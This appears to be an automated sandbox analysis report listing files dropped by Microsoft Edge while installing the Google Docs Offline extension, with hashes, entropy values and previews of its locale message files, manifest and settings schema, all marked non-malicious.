                                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11280
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                                  MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                                  SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                                  SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                                  SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                                  MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                                  SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                                  SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                                  SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
